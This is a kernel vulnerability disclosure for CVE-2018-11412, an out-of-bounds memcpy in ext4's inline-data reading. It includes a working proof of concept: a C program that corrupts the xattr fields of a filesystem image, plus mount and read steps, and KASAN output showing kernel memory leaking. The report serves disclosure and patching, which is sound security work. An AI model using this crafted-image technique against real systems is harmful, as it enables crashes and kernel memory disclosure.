ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: the first 60 bytes go in the i_block field in the inode (which normally contains a list of blocks instead), and the rest goes in the special filesystem-internal extended attribute "system.data". Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can store extended attribute values not only inline in the inode, but also in dedicated inodes. When a corrupted filesystem stores the system.data extended attribute value in a dedicated inode, the kernel gets confused, causing memory corruption. ext4_find_inline_data_nolock() attempts to locate an inode's inline data by searching for the system.data xattr using ext4_xattr_ibody_find(). If the inode has xattrs, ext4_xattr_ibody_find() first checks them for corruption using xattr_check_inode(), then grabs the wanted xattr using xattr_find_entry(). xattr_check_inode() uses ext4_xattr_check_entries() to check the individual xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr whose value is in a dedicated inode); the length and offset checks that ensure that the value actually fits into the inode are performed only for inline values. The problem is that ext4_find_inline_data_nolock() then assumes that the returned xattr uses inline storage and that the returned length will fit into the inode; it stores the length field from the xattr in `EXT4_I(inode)->i_inline_size` without further checks. Later, when the file is read, ext4_read_inline_data() trusts this length value, causing an out-of-bounds memcpy() in the following line: memcpy(buffer, (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: 1. 
Create a new ext4 filesystem image, with 256-byte inodes and inline data support: $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k mke2fs 1.43.7 (16-Oct-2017) Creating regular file testfs.img Filesystem too small for a journal Creating filesystem with 100 4k blocks and 64 inodes Allocating group tables: done Writing inode tables: done Writing superblocks and filesystem accounting information: done 2. Create a 75-byte file in the new filesystem: $ mkdir mount $ sudo mount testfs.img mount $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile 1+0 records in 1+0 records out 75 bytes copied, 0.000811554 s, 92.4 kB/s $ sudo umount mount 3. Bump up the inode size, bump up the xattr size, and mark the xattr value as non-inline: $ cat fixup.c #include <stdint.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/stat.h> #define __le16 uint16_t #define __le32 uint32_t #define __u16 uint16_t #define __u32 uint32_t #define __u8 uint8_t /* some definitions from kernel headers */ #define EXT4_NDIR_BLOCKS 12 #define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) #define EXT4_XATTR_MAGIC 0xEA020000 struct ext4_inode { __le16 i_mode; __le16 i_uid; __le32 i_size_lo; __le32 i_atime; __le32 i_ctime; __le32 i_mtime; __le32 i_dtime; __le16 i_gid; __le16 i_links_count; __le32 i_blocks_lo; __le32 i_flags; union { struct { __le32 l_i_version; } linux1; } osd1; __le32 i_block[EXT4_N_BLOCKS]; __le32 i_generation; __le32 i_file_acl_lo; __le32 i_size_high; __le32 i_obso_faddr; union { struct { __le16 l_i_blocks_high; __le16 l_i_file_acl_high; __le16 l_i_uid_high; __le16 l_i_gid_high; __le16 l_i_checksum_lo; __le16 l_i_reserved; } linux2; } osd2; __le16 i_extra_isize; __le16 i_checksum_hi; __le32 i_ctime_extra; __le32 i_mtime_extra; __le32 i_atime_extra; __le32 i_crtime; __le32 i_crtime_extra; __le32 
i_version_hi; __le32 i_projid; }; struct ext4_xattr_ibody_header { __le32 h_magic; }; struct ext4_xattr_entry { __u8 e_name_len; __u8 e_name_index; __le16 e_value_offs; __le32 e_value_inum; __le32 e_value_size; __le32 e_hash; char e_name[0]; }; #define INODE_SIZE 256 #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) int main(int argc, char **argv) { char *path = argv[1]; int fd = open(path, O_RDWR); if (fd == -1) err(1, "open"); struct stat st; if (fstat(fd, &st)) err(1, "fstat"); char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (map == MAP_FAILED) err(1, "mmap"); for (int i=0; i<st.st_size/INODE_SIZE; i++) { struct ext4_inode *ino = (void*)(map + i * INODE_SIZE); if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue; printf("found inode (idx=%d, size=%u, mode=%ho)\n", i, ino->i_size_lo, ino->i_mode); ino->i_size_lo = 60000; printf(" i_extra_isize = %hu\n", ino->i_extra_isize); struct ext4_xattr_ibody_header *hdr = (void*)( ((char*)ino)+128+ino->i_extra_isize ); if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; struct ext4_xattr_entry *entry = (void*)(hdr+1); while (*(uint32_t*)entry != 0) { printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", entry->e_name_index, entry->e_name_len, entry->e_name, entry->e_value_offs, entry->e_value_inum, entry->e_value_size); entry->e_value_offs = 0; entry->e_value_inum = 20; entry->e_value_size = 60000; entry = (void*)( (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) ); } } } $ gcc -o fixup fixup.c -Wall $ ./fixup testfs.img found inode (idx=555, size=75, mode=100644) i_extra_isize = 32 attr: idx=7 name='data' offs=76 inum=0 size=15 4. Use fsck to fix up the inode checksum (but don't let it fix anything else!): $ fsck.ext4 -f testfs.img e2fsck 1.43.7 (16-Oct-2017) Pass 1: Checking inodes, blocks, and sizes Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate<y>? 
no Extended attribute in inode 12 has a value size (60000) which is invalid Clear<y>? no Inode 12 passes checks, but checksum does not match inode. Fix<y>? yes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Pass 5: Checking group summary information testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** testfs.img: ********** WARNING: Filesystem still has errors ********** testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks 5. Mount the filesystem again: $ sudo mount testfs.img mount 6. Read the file: $ hexdump -C mount/testfile 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................| 00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............| 000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................| 000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......| 000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............| 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| [...] 7. Check dmesg: $ dmesg [...] [ 3211.552729] ================================================================== [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 [ 3211.552799] Call Trace: [ 3211.552807] dump_stack+0x71/0xab [ 3211.552813] print_address_description+0x6a/0x250 [ 3211.552817] kasan_report+0x258/0x380 [ 3211.552863] ? 
ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552867] memcpy+0x34/0x50 [ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4] [ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4] [ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4] [ 3211.553101] ext4_readpage+0xf5/0x110 [ext4] [ 3211.553106] generic_file_read_iter+0x9a4/0xea0 [ 3211.553112] ? filemap_range_has_page+0x160/0x160 [ 3211.553116] ? save_stack+0x89/0xb0 [ 3211.553120] ? __kasan_slab_free+0x105/0x150 [ 3211.553124] ? aa_path_link+0x1f0/0x1f0 [ 3211.553128] ? do_syscall_64+0x150/0x160 [ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553137] ? audit_watch_compare+0x1b/0x50 [ 3211.553142] __vfs_read+0x239/0x340 [ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 3211.553149] ? dput.part.19+0x2e/0x1b0 [ 3211.553154] ? auditd_test_task+0x43/0x60 [ 3211.553158] vfs_read+0xa5/0x190 [ 3211.553162] ksys_read+0xa1/0x120 [ 3211.553166] ? kernel_write+0xa0/0xa0 [ 3211.553171] do_syscall_64+0x6d/0x160 [ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553178] RIP: 0033:0x7f9ada1af72c [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [...] 
[ 3211.553197] The buggy address belongs to the page: [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 [ 3211.553207] flags: 0x17fffc000000021(locked|lru) [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 [ 3211.553222] page dumped because: kasan: bad access detected [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 [ 3211.553229] Memory state around the buggy address: [ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553246] ^ [ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553257] ================================================================== Occasionally this will also cause unrelated userspace processes to segfault.
MITRE has assigned CVE-2018-11412 to this issue; see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11412 for details.